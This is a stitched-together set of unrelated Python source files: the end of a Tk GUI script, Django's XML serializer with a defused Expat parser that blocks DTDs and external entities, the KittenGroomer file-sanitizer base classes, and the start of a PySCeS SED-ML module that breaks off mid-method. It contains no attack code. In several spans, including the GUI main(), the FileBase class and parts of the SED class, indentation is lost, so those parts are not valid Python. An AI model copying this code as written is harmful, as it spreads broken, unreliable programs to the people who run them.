        """Leave the Tk mainloop unconditionally."""
        self.frame.quit()

    def OnFinish(self):
        """Ask the running acquisition to finish cleanly (checked by pgmmain)."""
        base.Globs["finishflag"] = True

    def OnQuit(self):
        """Quit immediately when idle; while running, first press requests a
        stop via the global quitflag, second press forces the exit."""
        if not self.isrunning:
            self.reallyquit()
        if base.Globs["quitflag"]:
            self.reallyquit()
        base.Globs["quitflag"] = True
def main(argv=None):
if argv is None:
argv = sys.argv
options = "ht:l"
theme = "alt"
list_all = False
try:
try:
opts, datafiles = getopt.getopt(argv[1:], options, ["help"])
except getopt.error, msg:
raise Usage(msg)
# process options
for o, a in opts:
if o in ("-h", "--help"):
print __doc__ + "\nversion: " + version
sys.exit(0)
elif o == "-l":
list_all = True
elif o == "-t":
theme = a
else:
print "unknown argument: " + a
print __doc__ + "\nversion: " + version
sys.exit(1)
if list_all:
style = ttk.Style()
print "available themes:"
for t in style.theme_names():
print " " + t
return 0
app = App(theme)
app.root.mainloop()
try:
app.root.destroy()
except:
pass
except Exception, e:
log().exception("gui error")
print >> sys.stderr, e
return 3
if __name__ == "__main__":
    # Exit with main()'s return value (None maps to exit status 0).
    sys.exit(main())
| |
"""
XML serializer.
"""
from xml.dom import pulldom
from xml.sax import handler
from xml.sax.expatreader import ExpatParser as _ExpatParser
from django.apps import apps
from django.conf import settings
from django.core.serializers import base
from django.db import DEFAULT_DB_ALIAS, models
from django.utils.xmlutils import (
SimplerXMLGenerator, UnserializableContentError,
)
class Serializer(base.Serializer):
    """Serialize a QuerySet to XML."""

    def indent(self, level):
        # 'is not None' (not truthiness) so indent=0 still emits newlines.
        if self.options.get('indent') is not None:
            self.xml.ignorableWhitespace(
                '\n' + ' ' * self.options.get('indent') * level)

    def start_serialization(self):
        """
        Start serialization -- open the XML document and the root element.
        """
        self.xml = SimplerXMLGenerator(self.stream, self.options.get(
            "encoding", settings.DEFAULT_CHARSET))
        self.xml.startDocument()
        self.xml.startElement("django-objects", {"version": "1.0"})

    def end_serialization(self):
        """
        End serialization -- end the document.
        """
        self.indent(0)
        self.xml.endElement("django-objects")
        self.xml.endDocument()

    def start_object(self, obj):
        """
        Called as each object is handled.
        """
        if not hasattr(obj, "_meta"):
            raise base.SerializationError(
                "Non-model object (%s) encountered during serialization" % type(obj))
        self.indent(1)
        attrs = {'model': str(obj._meta)}
        # The pk attribute is omitted when serializing by natural key.
        if not self.use_natural_primary_keys or not hasattr(obj, 'natural_key'):
            obj_pk = obj.pk
            if obj_pk is not None:
                attrs['pk'] = str(obj_pk)
        self.xml.startElement("object", attrs)

    def end_object(self, obj):
        """
        Called after handling all fields for an object.
        """
        self.indent(1)
        self.xml.endElement("object")

    def handle_field(self, obj, field):
        """
        Handle each field on an object (except for ForeignKeys and
        ManyToManyFields).
        """
        self.indent(2)
        self.xml.startElement('field', {
            'name': field.name,
            'type': field.get_internal_type(),
        })
        # Get a "string version" of the object's data.
        if getattr(obj, field.name) is not None:
            try:
                self.xml.characters(field.value_to_string(obj))
            except UnserializableContentError:
                raise ValueError("%s.%s (pk:%s) contains unserializable characters" % (
                    obj.__class__.__name__, field.name, obj.pk))
        else:
            # NULL values are represented by an empty <None/> element.
            self.xml.addQuickElement("None")
        self.xml.endElement("field")

    def handle_fk_field(self, obj, field):
        """
        Handle a ForeignKey (they need to be treated slightly
        differently from regular fields).
        """
        self._start_relational_field(field)
        related_att = getattr(obj, field.get_attname())
        if related_att is not None:
            if self.use_natural_foreign_keys and hasattr(field.remote_field.model, 'natural_key'):
                related = getattr(obj, field.name)
                # If related object has a natural key, use it
                related = related.natural_key()
                # Iterable natural keys are rolled out as subelements
                for key_value in related:
                    self.xml.startElement("natural", {})
                    self.xml.characters(str(key_value))
                    self.xml.endElement("natural")
            else:
                self.xml.characters(str(related_att))
        else:
            self.xml.addQuickElement("None")
        self.xml.endElement("field")

    def handle_m2m_field(self, obj, field):
        """
        Handle a ManyToManyField. Related objects are only serialized as
        references to the object's PK (i.e. the related *data* is not dumped,
        just the relation).
        """
        # Explicit (non-auto-created) through models are serialized as their
        # own objects, so skip the relation here.
        if field.remote_field.through._meta.auto_created:
            self._start_relational_field(field)
            if self.use_natural_foreign_keys and hasattr(field.remote_field.model, 'natural_key'):
                # If the objects in the m2m have a natural key, use it
                def handle_m2m(value):
                    natural = value.natural_key()
                    # Iterable natural keys are rolled out as subelements
                    self.xml.startElement("object", {})
                    for key_value in natural:
                        self.xml.startElement("natural", {})
                        self.xml.characters(str(key_value))
                        self.xml.endElement("natural")
                    self.xml.endElement("object")
            else:
                def handle_m2m(value):
                    self.xml.addQuickElement("object", attrs={
                        'pk': str(value.pk)
                    })
            for relobj in getattr(obj, field.name).iterator():
                handle_m2m(relobj)
            self.xml.endElement("field")

    def _start_relational_field(self, field):
        """Output the <field> element for relational fields."""
        self.indent(2)
        self.xml.startElement('field', {
            'name': field.name,
            'rel': field.remote_field.__class__.__name__,
            'to': str(field.remote_field.model._meta),
        })
class Deserializer(base.Deserializer):
    """Deserialize XML."""

    def __init__(self, stream_or_string, *, using=DEFAULT_DB_ALIAS, ignorenonexistent=False, **options):
        super().__init__(stream_or_string, **options)
        # Stream events lazily so arbitrarily large documents can be read.
        self.event_stream = pulldom.parse(self.stream, self._make_parser())
        self.db = using
        self.ignore = ignorenonexistent

    def _make_parser(self):
        """Create a hardened XML parser (no custom/external entities)."""
        return DefusedExpatParser()

    def __next__(self):
        # Advance to the next <object> element and expand only that subtree.
        for event, node in self.event_stream:
            if event == "START_ELEMENT" and node.nodeName == "object":
                self.event_stream.expandNode(node)
                return self._handle_object(node)
        raise StopIteration

    def _handle_object(self, node):
        """Convert an <object> node to a DeserializedObject."""
        # Look up the model using the model loading mechanism. If this fails,
        # bail.
        Model = self._get_model_from_node(node, "model")
        # Start building a data dictionary from the object.
        data = {}
        if node.hasAttribute('pk'):
            data[Model._meta.pk.attname] = Model._meta.pk.to_python(
                node.getAttribute('pk'))
        # Also start building a dict of m2m data (this is saved as
        # {m2m_accessor_attribute : [list_of_related_objects]})
        m2m_data = {}
        field_names = {f.name for f in Model._meta.get_fields()}
        # Deserialize each field.
        for field_node in node.getElementsByTagName("field"):
            # If the field is missing the name attribute, bail (are you
            # sensing a pattern here?)
            field_name = field_node.getAttribute("name")
            if not field_name:
                raise base.DeserializationError(
                    "<field> node is missing the 'name' attribute")
            # Get the field from the Model. This will raise a
            # FieldDoesNotExist if, well, the field doesn't exist, which will
            # be propagated correctly unless ignorenonexistent=True is used.
            if self.ignore and field_name not in field_names:
                continue
            field = Model._meta.get_field(field_name)
            # As is usually the case, relation fields get the special
            # treatment.
            if field.remote_field and isinstance(field.remote_field, models.ManyToManyRel):
                m2m_data[field.name] = self._handle_m2m_field_node(
                    field_node, field)
            elif field.remote_field and isinstance(field.remote_field, models.ManyToOneRel):
                data[field.attname] = self._handle_fk_field_node(
                    field_node, field)
            else:
                # A <None/> child marks a NULL value.
                if field_node.getElementsByTagName('None'):
                    value = None
                else:
                    value = field.to_python(getInnerText(field_node).strip())
                data[field.name] = value
        obj = base.build_instance(Model, data, self.db)
        # Return a DeserializedObject so that the m2m data has a place to live.
        return base.DeserializedObject(obj, m2m_data)

    def _handle_fk_field_node(self, node, field):
        """
        Handle a <field> node for a ForeignKey
        """
        # Check if there is a child node named 'None', returning None if so.
        if node.getElementsByTagName('None'):
            return None
        else:
            model = field.remote_field.model
            if hasattr(model._default_manager, 'get_by_natural_key'):
                keys = node.getElementsByTagName('natural')
                if keys:
                    # If there are 'natural' subelements, it must be a natural
                    # key
                    field_value = [getInnerText(k).strip() for k in keys]
                    obj = model._default_manager.db_manager(
                        self.db).get_by_natural_key(*field_value)
                    obj_pk = getattr(obj, field.remote_field.field_name)
                    # If this is a natural foreign key to an object that
                    # has a FK/O2O as the foreign key, use the FK value
                    if field.remote_field.model._meta.pk.remote_field:
                        obj_pk = obj_pk.pk
                else:
                    # Otherwise, treat like a normal PK
                    field_value = getInnerText(node).strip()
                    obj_pk = model._meta.get_field(
                        field.remote_field.field_name).to_python(field_value)
                return obj_pk
            else:
                field_value = getInnerText(node).strip()
                return model._meta.get_field(field.remote_field.field_name).to_python(field_value)

    def _handle_m2m_field_node(self, node, field):
        """
        Handle a <field> node for a ManyToManyField.
        """
        model = field.remote_field.model
        default_manager = model._default_manager
        if hasattr(default_manager, 'get_by_natural_key'):
            def m2m_convert(n):
                keys = n.getElementsByTagName('natural')
                if keys:
                    # If there are 'natural' subelements, it must be a natural
                    # key
                    field_value = [getInnerText(k).strip() for k in keys]
                    obj_pk = default_manager.db_manager(
                        self.db).get_by_natural_key(*field_value).pk
                else:
                    # Otherwise, treat like a normal PK value.
                    obj_pk = model._meta.pk.to_python(n.getAttribute('pk'))
                return obj_pk
        else:
            def m2m_convert(n):
                return model._meta.pk.to_python(n.getAttribute('pk'))
        return [m2m_convert(c) for c in node.getElementsByTagName("object")]

    def _get_model_from_node(self, node, attr):
        """
        Look up a model from a <object model=...> or a <field rel=... to=...>
        node.
        """
        model_identifier = node.getAttribute(attr)
        if not model_identifier:
            raise base.DeserializationError(
                "<%s> node is missing the required '%s' attribute"
                % (node.nodeName, attr))
        try:
            return apps.get_model(model_identifier)
        except (LookupError, TypeError):
            raise base.DeserializationError(
                "<%s> node has invalid model identifier: '%s'"
                % (node.nodeName, model_identifier))
def getInnerText(node):
    """Get all the inner text of a DOM node (recursively)."""
    # inspired by
    # http://mail.python.org/pipermail/xml-sig/2005-March/011022.html
    pieces = []
    for child in node.childNodes:
        if child.nodeType in (child.TEXT_NODE, child.CDATA_SECTION_NODE):
            pieces.append(child.data)
        elif child.nodeType == child.ELEMENT_NODE:
            # Recurse into elements; other node types (comments, PIs) are
            # ignored.
            pieces.extend(getInnerText(child))
    return "".join(pieces)
# Below code based on Christian Heimes' defusedxml
class DefusedExpatParser(_ExpatParser):
    """
    An expat parser hardened against XML bomb attacks.

    Forbid DTDs, external entity references
    """
    def __init__(self, *args, **kwargs):
        _ExpatParser.__init__(self, *args, **kwargs)
        # Never fetch external general/parameter entities.
        self.setFeature(handler.feature_external_ges, False)
        self.setFeature(handler.feature_external_pes, False)

    def start_doctype_decl(self, name, sysid, pubid, has_internal_subset):
        # Any DOCTYPE at all is rejected (blocks billion-laughs setups).
        raise DTDForbidden(name, sysid, pubid)

    def entity_decl(self, name, is_parameter_entity, value, base,
                    sysid, pubid, notation_name):
        raise EntitiesForbidden(name, value, base, sysid, pubid, notation_name)

    def unparsed_entity_decl(self, name, base, sysid, pubid, notation_name):
        # expat 1.2
        raise EntitiesForbidden(name, None, base, sysid, pubid, notation_name)

    def external_entity_ref_handler(self, context, base, sysid, pubid):
        raise ExternalReferenceForbidden(context, base, sysid, pubid)

    def reset(self):
        # Re-install the forbidding handlers each time the underlying expat
        # parser is (re)created.
        _ExpatParser.reset(self)
        parser = self._parser
        parser.StartDoctypeDeclHandler = self.start_doctype_decl
        parser.EntityDeclHandler = self.entity_decl
        parser.UnparsedEntityDeclHandler = self.unparsed_entity_decl
        parser.ExternalEntityRefHandler = self.external_entity_ref_handler
class DefusedXmlException(ValueError):
    """Common base for all defused-XML errors."""

    def __repr__(self):
        # The repr is simply the human-readable message.
        return str(self)
class DTDForbidden(DefusedXmlException):
    """Document type definition is forbidden."""

    def __init__(self, name, sysid, pubid):
        super().__init__()
        self.name = name
        self.sysid = sysid
        self.pubid = pubid

    def __str__(self):
        return "DTDForbidden(name='{}', system_id={!r}, public_id={!r})".format(
            self.name, self.sysid, self.pubid)
class EntitiesForbidden(DefusedXmlException):
    """Entity definition is forbidden."""

    def __init__(self, name, value, base, sysid, pubid, notation_name):
        super().__init__()
        self.name = name
        self.value = value
        self.base = base
        self.sysid = sysid
        self.pubid = pubid
        self.notation_name = notation_name

    def __str__(self):
        # value/base/notation_name are kept as attributes but not shown.
        return "EntitiesForbidden(name='{}', system_id={!r}, public_id={!r})".format(
            self.name, self.sysid, self.pubid)
class ExternalReferenceForbidden(DefusedXmlException):
    """Resolving an external reference is forbidden."""

    def __init__(self, context, base, sysid, pubid):
        super().__init__()
        self.context = context
        self.base = base
        self.sysid = sysid
        self.pubid = pubid

    def __str__(self):
        return "ExternalReferenceForbidden(system_id='{}', public_id={})".format(
            self.sysid, self.pubid)
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Contains the base objects for use when creating a sanitizer using
PyCIRCLean. Subclass or import from FileBase/KittenGroomerBase and implement
your desired behavior.
"""
import os
import hashlib
import shutil
import argparse
import stat
import magic
class FileBase(object):
"""
Base object for individual files in the source directory.
Contains file attributes and various helper methods.
"""
    def __init__(self, src_path, dst_path):
        """
        Initialized with the source path and expected destination path.

        Create various properties and determine the file's mimetype.
        """
        self.src_path = src_path
        self.dst_dir = os.path.dirname(dst_path)
        self.filename = os.path.basename(src_path)
        self.size = self._get_size(src_path)
        self.is_dangerous = False
        self.copied = False
        self.symlink_path = None
        self._description_string = []  # array of descriptions to be joined
        self._errors = {}
        self._user_defined = {}
        self.should_copy = True
        # Done last: _determine_mimetype may record errors and symlink info
        # on self via add_error/set_property.
        self.mimetype = self._determine_mimetype(src_path)
    @property
    def dst_path(self):
        # Recomputed from dst_dir + filename so renames (e.g. make_dangerous,
        # force_ext) are reflected automatically.
        return os.path.join(self.dst_dir, self.filename)

    @property
    def extension(self):
        # Lower-cased extension including the leading dot, or None if absent.
        _, ext = os.path.splitext(self.filename)
        if ext == '':
            return None
        else:
            return ext.lower()

    @property
    def maintype(self):
        # Part of the mimetype before the '/', or None.
        main, _ = self._split_mimetype(self.mimetype)
        return main

    @property
    def subtype(self):
        # Part of the mimetype after the '/', or None.
        _, sub = self._split_mimetype(self.mimetype)
        return sub

    @property
    def has_mimetype(self):
        """True if file has a main and sub mimetype, else False."""
        if not self.maintype or not self.subtype:
            return False
        else:
            return True

    @property
    def has_extension(self):
        """True if self.extension is set, else False."""
        if self.extension is None:
            return False
        else:
            return True

    @property
    def is_symlink(self):
        """True if file is a symlink, else False."""
        if self.symlink_path is None:
            return False
        else:
            return True
    @property
    def description_string(self):
        # Human-readable summary of all descriptions collected so far.
        if len(self._description_string) == 0:
            return 'No description'
        elif len(self._description_string) == 1:
            return self._description_string[0]
        else:
            ret_string = ', '.join(self._description_string)
            return ret_string.strip(', ')

    @description_string.setter
    def description_string(self, value):
        # hasattr() probes the getter: it is False only while the backing
        # _description_string list does not exist yet (the getter raises
        # AttributeError then), in which case 'value' replaces the backing
        # store wholesale.  Otherwise strings are appended, de-duplicated.
        if hasattr(self, 'description_string'):
            if isinstance(value, str):
                if value not in self._description_string:
                    self._description_string.append(value)
            else:
                raise TypeError("Description_string can only include strings")
        else:
            self._description_string = value
def set_property(self, prop_string, value):
"""
Take a property and a value and add them to the file's stored props.
If `prop_string` is part of the file property API, set it to `value`.
Otherwise, add `prop_string`: `value` to `user_defined` properties.
TODO: rewrite docstring
"""
if hasattr(self, prop_string):
setattr(self, prop_string, value)
else:
self._user_defined[prop_string] = value
def get_property(self, prop_string):
"""
Get the value for a property stored on the file.
Returns `None` if `prop_string` cannot be found on the file.
"""
try:
return getattr(self, prop_string)
except AttributeError:
return self._user_defined.get(prop_string, None)
    def get_all_props(self):
        """Return a dict containing all stored properties of this file."""
        # Maybe move this onto the logger? I think that makes more sense
        props_dict = {
            'filepath': self.src_path,
            'filename': self.filename,
            'file_size': self.size,
            'mimetype': self.mimetype,
            'maintype': self.maintype,
            'subtype': self.subtype,
            'extension': self.extension,
            'is_dangerous': self.is_dangerous,
            'is_symlink': self.is_symlink,
            'symlink_path': self.symlink_path,
            'copied': self.copied,
            'description_string': self.description_string,
            'errors': self._errors,
            'user_defined': self._user_defined
        }
        return props_dict
def add_error(self, error, info_string):
"""Add an `error`: `info_string` pair to the file."""
self._errors.update({error: info_string})
    def add_description(self, description_string):
        """
        Add a description string to the file.

        If `description_string` is already present, will prevent duplicates.
        """
        # Routed through set_property so the description_string setter can
        # enforce the string type and de-duplicate.
        self.set_property('description_string', description_string)
    def make_dangerous(self, reason_string=None):
        """
        Mark file as dangerous.

        Prepend and append DANGEROUS to the destination file name
        to help prevent double-click of death.
        """
        # Idempotent: the guard keeps the filename from being wrapped twice.
        if not self.is_dangerous:
            self.set_property('is_dangerous', True)
            # dst_path picks the new name up automatically (it is a property).
            self.filename = 'DANGEROUS_{}_DANGEROUS'.format(self.filename)
        if reason_string:
            self.add_description(reason_string)
    def safe_copy(self, src=None, dst=None):
        """
        Copy file and create destination directories if needed.

        Sets all exec bits to '0'.  `src` and `dst` default to this file's
        src_path and (current) dst_path.
        """
        if src is None:
            src = self.src_path
        if dst is None:
            dst = self.dst_path
        try:
            os.makedirs(self.dst_dir, exist_ok=True)
            shutil.copy(src, dst)
            # Strip u/g/o execute bits so a copied file can't be launched.
            current_perms = self._get_file_permissions(dst)
            only_exec_bits = 0o0111
            perms_no_exec = current_perms & (~only_exec_bits)
            os.chmod(dst, perms_no_exec)
        except IOError as e:
            # Probably means we can't write in the dest dir
            self.add_error(e, '')
def force_ext(self, extension):
    """If dst_path does not end in `extension`, append .ext to it."""
    normalized = self._check_leading_dot(extension)
    if not self.filename.endswith(normalized):
        # TODO: log that the extension was changed
        self.filename += normalized
    if self.get_property('extension') != normalized:
        self.set_property('extension', normalized)
def create_metadata_file(self, extension):
    # TODO: this method name is confusing
    """
    Create a separate file to hold extracted metadata.
    The string `extension` will be used as the extension for the file.
    Returns the metadata file path, or False when the path would collide
    with an existing file from the source tree.
    """
    ext = self._check_leading_dot(extension)
    try:
        # Prevent using the same path as another file from src_path
        if os.path.exists(self.src_path + ext):
            raise KittenGroomerError(
                "Could not create metadata file for \"" +
                self.filename +
                "\": a file with that path exists.")
        else:
            os.makedirs(self.dst_dir, exist_ok=True)
            # TODO: shouldn't mutate state and also return something
            self.metadata_file_path = self.dst_path + ext
            return self.metadata_file_path
    # TODO: can probably let this exception bubble up
    except KittenGroomerError as e:
        # Raise-then-catch of our own error: record it and signal failure.
        self.add_error(e, '')
        return False
def _check_leading_dot(self, ext):
# TODO: this method name is confusing
if len(ext) > 0:
if not ext.startswith('.'):
return '.' + ext
return ext
def _determine_mimetype(self, file_path):
    # Best-effort mimetype: 'inode/symlink' for symlinks, else libmagic.
    if os.path.islink(file_path):
        # libmagic will throw an IOError on a broken symlink
        mimetype = 'inode/symlink'
        self.set_property('symlink_path', os.readlink(file_path))
    else:
        try:
            mt = magic.from_file(file_path, mime=True)
            # libmagic always returns something, even if it's just 'data'
        except UnicodeEncodeError as e:
            # Non-encodable path: record the error and fall through.
            self.add_error(e, '')
            mt = None
        try:
            mimetype = mt.decode("utf-8")
        except:
            # FIXME: what should the exception be if mimetype isn't utf-8?
            # NOTE(review): this branch is also taken when mt is None or
            # already a str (AttributeError) -- newer python-magic returns
            # str rather than bytes; confirm the installed version.
            mimetype = mt
    return mimetype
def _split_mimetype(self, mimetype):
if mimetype and '/' in mimetype:
main_type, sub_type = mimetype.split('/')
else:
main_type, sub_type = None, None
return main_type, sub_type
def _get_size(self, file_path):
"""Filesize in bytes as an int, 0 if file does not exist."""
try:
size = os.path.getsize(file_path)
except FileNotFoundError:
size = 0
return size
def _remove_exec_bit(self, file_path):
    # Clear the owner-execute bit (stat.S_IEXEC); group/other exec bits
    # are stripped separately in safe_copy (which masks 0o111).
    current_perms = self._get_file_permissions(file_path)
    perms_no_exec = current_perms & (~stat.S_IEXEC)
    os.chmod(file_path, perms_no_exec)
def _get_file_permissions(self, file_path):
full_mode = os.stat(file_path, follow_symlinks=False).st_mode
return stat.S_IMODE(full_mode)
class Logging(object):
    """Namespace for logging-related helpers."""

    @staticmethod
    def computehash(path):
        """Return the sha256 hash of a file at a given path."""
        hasher = hashlib.sha256()
        with open(path, 'rb') as f:
            # Feed the digest 1 MiB (0x100000) at a time until EOF.
            for chunk in iter(lambda: f.read(0x100000), b''):
                hasher.update(chunk)
        return hasher.hexdigest()
class KittenGroomerBase(object):
    """Base object responsible for copy/sanitization process."""

    def __init__(self, src_root_path, dst_root_path):
        """Initialized with paths to source and dest directories."""
        self.src_root_path = os.path.abspath(src_root_path)
        self.dst_root_path = os.path.abspath(dst_root_path)

    def safe_rmtree(self, directory_path):
        """Remove a directory tree if it exists."""
        if os.path.exists(directory_path):
            shutil.rmtree(directory_path)

    def safe_remove(self, file_path):
        """Remove file at file_path if it exists."""
        # EAFP instead of exists()+remove(): closes the check-then-act race.
        try:
            os.remove(file_path)
        except FileNotFoundError:
            pass

    def safe_mkdir(self, directory_path):
        """Make a directory (and parents) if it does not exist."""
        # exist_ok closes the exists()/makedirs() race and matches the
        # makedirs(..., exist_ok=True) usage elsewhere in this file.
        try:
            os.makedirs(directory_path, exist_ok=True)
        except FileExistsError:
            # Path exists but is not a directory; the original silently
            # did nothing in that case, so preserve that behavior.
            pass

    def list_all_files(self, directory_path):
        """Generator yielding path to all of the files in a directory tree."""
        for root, dirs, files in os.walk(directory_path):
            for filename in files:
                yield os.path.join(root, filename)

    #######################
    def processdir(self, src_dir, dst_dir):
        """Implement this function to define file processing behavior."""
        raise ImplementationRequired('Please implement processdir.')
class KittenGroomerError(Exception):
    """Base KittenGroomer exception handler."""

    def __init__(self, message):
        super().__init__(message)
        # Keep the message on the instance for callers that read it directly.
        self.message = message
class ImplementationRequired(KittenGroomerError):
    """Raised when a subclass fails to override a required method."""
    pass
def main(
        kg_implementation,
        description=("Call a KittenGroomer implementation to process files "
                     "present in the source directory and copy them to the "
                     "destination directory.")):
    """CLI entry point: parse -s/-d options and run `kg_implementation`.

    NOTE(review): processdir() is called with no arguments here, while
    KittenGroomerBase.processdir takes (src_dir, dst_dir) -- implementations
    passed in are presumably expected to override it with a no-argument
    signature; confirm against callers. Also note neither option is marked
    required, so args.source/args.destination may be None.
    """
    print(description)
    parser = argparse.ArgumentParser(prog='KittenGroomer', description=description)
    parser.add_argument('-s', '--source', type=str, help='Source directory')
    parser.add_argument('-d', '--destination', type=str, help='Destination directory')
    args = parser.parse_args()
    kg = kg_implementation(args.source, args.destination)
    kg.processdir()
| |
"""
PySCeS - Python Simulator for Cellular Systems (http://pysces.sourceforge.net)
Copyright (C) 2004-2015 B.G. Olivier, J.M. Rohwer, J.-H.S Hofmeyr all rights reserved,
Brett G. Olivier (bgoli@users.sourceforge.net)
Triple-J Group for Molecular Cell Physiology
Stellenbosch University, South Africa.
Permission to use, modify, and distribute this software is given under the
terms of the PySceS (BSD style) license. See LICENSE.txt that came with
this distribution for specifics.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
Brett G. Olivier
"""
import os, time, numpy, itertools, cStringIO, subprocess, zipfile, cPickle
import pysces
class SBWSEDMLWebApps:
    """
    Class that holds useful methods for using SBW Webapps via a SUDS provided soap client
    """
    # NOTE: Python 2 module (print statements, `except E, ex`); do not run
    # under Python 3.
    Kclient = None          # suds SOAP client once connected
    SBWSEDMLURI = "http://sysbioapps.dyndns.org/SED-ML%20Web%20Tools/Services/SedMLService.asmx?WSDL"
    HAVE_SUDS = False       # True when suds imported AND client created
    _SED_CURRENT_ = False
    def __init__(self, url=None):
        """
        Attempt to create a connector if SUDS is install
        - *url* the url to the SBW SED-ML SOAP web services only set if the default doesn't work
        """
        if url == None:
            url = self.SBWSEDMLURI
        try:
            import suds
            self.HAVE_SUDS = True
        except:
            print('\nERROR: SUDS import error please install from http://pypi.python.org/pypi/suds (or easy_install suds)\n')
            self.HAVE_SUDS = False
        try:
            self.Kclient = suds.client.Client(url)
            self.SBWSEDMLURI = url
        except:
            print('\nERROR: Error connecting to SBW SED-ML web-services \"{}\" please check your internet connection\n'.format(url))
            self.HAVE_SUDS = False
    def GetVersion(self):
        """
        The ubiquitous connection test, returns the webservices version
        """
        if not self.HAVE_SUDS or self.Kclient == None:
            print('\nERROR: No suds client or connection, cannot comply with your request\n')
            return None
        try:
            print('Connecting ...')
            g = self.Kclient.service.GetVersion()
            print('done.')
        except Exception, ex:
            # NOTE(review): if the call raises, `g` is unbound and the
            # return below raises NameError.
            print('\nERROR: GetVersion() exception\n')
            print ex
        return g
    def ConvertScriptToSedML(self, sedscript):
        """
        Attempts to convert a string containing a sedml script into SEDML.
        See http://libsedml.sourceforge.net/libSedML/SedMLScript.html for more information on SedML script
        - *sedscript* A string containing a sedml script
        """
        if not self.HAVE_SUDS or self.Kclient == None:
            print('\nERROR: No suds client or connection, cannot comply with your request\n')
            return None
        try:
            print('Connecting ...')
            g = self.Kclient.service.ConvertScriptToSedML(sedscript)
            print('done.')
        except Exception, ex:
            # NOTE(review): same unbound-`g` hazard as GetVersion().
            print('\nERROR: ConvertScriptToSedML() exception\n')
            print ex
        return g
class SED(object):
    # Builder for SED-ML documents/archives from PySCeS models (Python 2).
    script = None
    xml = None
    cntr = None             # itertools.count() for unique variable ids
    sedpath = None          # output directory: <sedpath>/<id>
    models = None           # id -> PySCeS model
    sims = None             # id -> simulation settings dict
    id = None
    tasks = None            # id -> {'sim': sim_id, 'model': model_id}
    datagens = None         # data generator id -> {varId, taskId, var}
    plots2d = None          # plot id -> {'name', 'curves'}
    libSEDMLpath = None     # path to SedMLConsole.exe (local converter)
    __sedscript__ = None    # path of last written SED-ML script
    __sedxml__ = None       # path of last written SED-ML XML
    __sedarchive__ = None   # path of last written archive
    omex_description = 'Created with PySCeS (http://pysces.sf.net)'
    HAVE_LIBSEDML = False
    HAVE_SBWSEDSOAP = False
    _SED_CURRENT_ = False   # bypass flag: use pre-set _SED_XML_ directly
    _SED_XML_ = None
    sbwsedclient = None
    def __init__(self, id, sedpath, libSEDMLpath=None, sbwsedmluri=None):
        """
        Try to establish whether we have access to libSEDML locally installed or the SBW SEDML webservices
        - *libSEDMLpath* [default=None] uses the default path to "SedMLConsole.exe" unless specified
        - *sbwsedmluri* [default=None] uses the default uri for the SBW webservices unless specified
        """
        if libSEDMLpath == None:
            # Windows default install path; embedded quotes are for shelling
            # out -- NOTE(review): they also make os.path.exists() below
            # False for this default, confirm that is intended.
            self.libSEDMLpath = "\"C:\\Program Files (x86)\\SED-ML Script Editor\\SedMLConsole.exe\""
        else:
            self.libSEDMLpath = libSEDMLpath
        if os.path.exists(self.libSEDMLpath):
            self.HAVE_LIBSEDML = True
        self.sbwsedclient = SBWSEDMLWebApps(sbwsedmluri)
        if self.sbwsedclient.HAVE_SUDS:
            self.HAVE_SBWSEDSOAP = True
        if not self.HAVE_LIBSEDML and not self.HAVE_SBWSEDSOAP:
            print('\nNo connection to libSEDML or SEDML webservices.')
        #self.sed = {}
        self.models = {}
        self.sims = {}
        self.tasks = {}
        self.datagens = {}
        self.plots2d = {}
        self.id = id
        self.sedpath = os.path.join(sedpath, id)
        self.cntr = itertools.count()
    def addModel(self, id, model):
        # Store a (cloned) PySCeS model under *id*.
        try:
            # NOTE(review): both branches are identical, so the has_key()
            # test (Python 2 only) has no effect here.
            if not self.models.has_key(id):
                self.models[id] = model.clone()
            else:
                self.models[id] = model.clone()
        except:
            print('\nWARNING: model clone failed, using more than one model per SED is not recomended!\n')
            self.models[id] = model
    def addModelAlt(self, id, model):
        # Clone-by-serialisation: pickle the model to disk, reload a fresh
        # copy, then delete the temporary .dat file.
        mid = str(time.time()).split('.')[0]
        storeObj(model, os.path.join(self.sedpath, mid))
        del model
        model = loadObj(os.path.join(self.sedpath, mid)+'.dat')
        if not self.models.has_key(id):
            self.models[id] = model
        else:
            self.models[id] = model
        os.remove(os.path.join(self.sedpath, mid)+'.dat')
    def addSimulation(self, id, start, end, steps, output, initial=None, algorithm='KISAO:0000019'):
        # Register a time-course simulation; *algorithm* is a KiSAO id and
        # *output* lists the columns to report.
        if initial == None:
            initial = start
        S = {'start' : start,
             'initial' : initial,
             'end' : end,
             'steps' : steps,
             'algorithm' : algorithm,
             'output' : output}
        self.sims[id] = S
    def addTask(self, id, sim_id, model_id):
        # Bind a registered simulation to a registered model.
        assert self.sims.has_key(sim_id), '\nBad simId'
        assert self.models.has_key(model_id), '\nBad modelId'
        self.tasks[id] = {'sim' : sim_id, 'model' : model_id}
    def addDataGenerator(self, var, task_id):
        # Normalise 'Time'/'TIME' to 'time'; varId gets a unique counter
        # suffix from self.cntr.
        if var.lower() == 'time':
            var = 'time'
        dgId = 'dg_%s_%s' % (task_id, var)
        # dgId = '%s' % (var)
        varId = '%s_%s' % (var, self.cntr.next())
        self.datagens[dgId] = {'varId' : varId, 'taskId' : task_id, 'var' : var}
    def addTaskDataGenerators(self, taskId):
        # One data generator per output column of the task's simulation.
        assert self.tasks.has_key(taskId), '\nBad taskId'
        print self.tasks
        for o_ in self.sims[self.tasks[taskId]['sim']]['output']:
            self.addDataGenerator(o_, taskId)
    def addPlot(self, plotId, plotName, listOfCurves):
        self.plots2d[plotId] = {'name' : plotName,
                                'curves' : listOfCurves}
    def addTaskPlot(self, taskId):
        # Default 2D plot: every non-time output curve against time.
        plotId = '%s_plot' % taskId
        name = 'Plot generated for Task: %s' % taskId
        curves = []
        for o_ in self.sims[self.tasks[taskId]['sim']]['output']:
            if o_ not in ['Time','TIME', 'time']:
                curves.append(('dg_%s_time' % (taskId), 'dg_%s_%s' % (taskId, o_)))
        self.addPlot(plotId, name, curves)
    def writeSedScript(self, sedx=False):
        # Serialise models/sims/tasks/datagens/plots to a SED-ML Script and
        # write it to <sedpath>/<id>.txt (or sedxtmp/ when building an
        # archive); also writes each model as SBML next to it.
        sedscr = cStringIO.StringIO()
        if not os.path.exists(self.sedpath):
            os.makedirs(self.sedpath)
        for m_ in self.models:
            if not sedx:
                # Standalone script: reference models by absolute path.
                mf = os.path.join(self.sedpath, '%s-%s.xml' % (self.id, m_))
                tmp = (m_, str(os.path.join(self.sedpath,'%s-%s.xml' % (self.id, m_))))
            else:
                # Archive build: relative names inside sedxtmp/.
